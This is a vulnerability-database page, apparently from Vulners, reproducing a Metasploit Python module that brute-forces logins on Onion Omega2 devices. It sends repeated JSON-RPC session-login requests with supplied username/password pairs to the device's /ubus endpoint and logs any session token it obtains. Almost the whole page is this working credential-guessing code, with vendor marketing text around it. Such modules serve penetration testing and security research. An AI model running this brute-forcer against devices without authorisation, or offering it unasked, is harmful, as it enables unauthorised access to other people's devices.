Lucene search
K

Onion Omega2 Login Brute-Force

🗓️ 30 Mar 2019 14:37:05Reported by Not So Attractive <github.com/nsa>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 104 Views

Onion Omega2 Login Brute-Force module for Onion Omega2 devices using Python to scan for valid login credentials and access the HTTPd Ubus service.

Code
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 2019-03-27 05-55

# Standard Modules
from metasploit import module, login_scanner
import json

# Extra Modules
dependencies_missing = False
try:
    import requests
except ImportError:
    dependencies_missing = True

# Metasploit Metadata
metadata = {
    'name': 'Onion Omega2 Login Brute-Force',
    'description': '''
        OnionOS login scanner module for Onion Omega2 devices.
    ''',
    'authors': [
        'Not So Attractive <github.com/nsa>'
    ],
    'date': '2019-03-27',
    'license': 'MSF_LICENSE',
    'references': [
    ],
    'type': 'single_host_login_scanner',
    'options': {
        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},
        'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},
        'userpass': {'type': 'string', 'description': 'A list of username/password combinations to try',
                     'required': False},
        'sleep_interval': {'type': 'float', 'description': 'Time in seconds to wait between login attempts',
                           'required': False}
    },
    'service_name': 'Onion Omega2 HTTPd Ubus',
}


def valid_login(host, rport, username, password):
    payload = {
        "jsonrpc": "2.0", "id": 0, "method": "call", "params": ["0" * 32, "session", "login",
                                                                {
                                                                    "username": username,
                                                                    "password": password
                                                                }]}
    url = 'http://' + str(host) + ':' + str(rport) + '/ubus'
    session = requests.Session()
    try:
        request = session.post(url, json=payload)
        response = json.loads(request.text)
        if response['result'][0] != 6 and len(response['result']) > 1:
            ubus_rpc_session = response['result'][1]['ubus_rpc_session']
            module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')
        else:
            return False
    except requests.exceptions.ConnectionError:
        module.log("Unhandled exception: ConnectionError", level='error')
        return False
    except ValueError:
        module.log("Unhandled exception: Response JSON DecodeError", level='error')
        return False
    except KeyError:
        module.log("Unhandled exception: Dictionary KerError in Response", level='error')
        return False
    else:
        return True


def run(args):
    if dependencies_missing:
        module.log('Python requests module missing, cannot continue', level='error')
        return
    scanner = login_scanner.make_scanner(
        lambda host, rport, username, password: valid_login(host, rport, username, password))
    scanner(args)


if __name__ == '__main__':
    module.run(metadata, run)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 May 2021 11:43Current
7.1High risk
Vulners AI Score7.1
104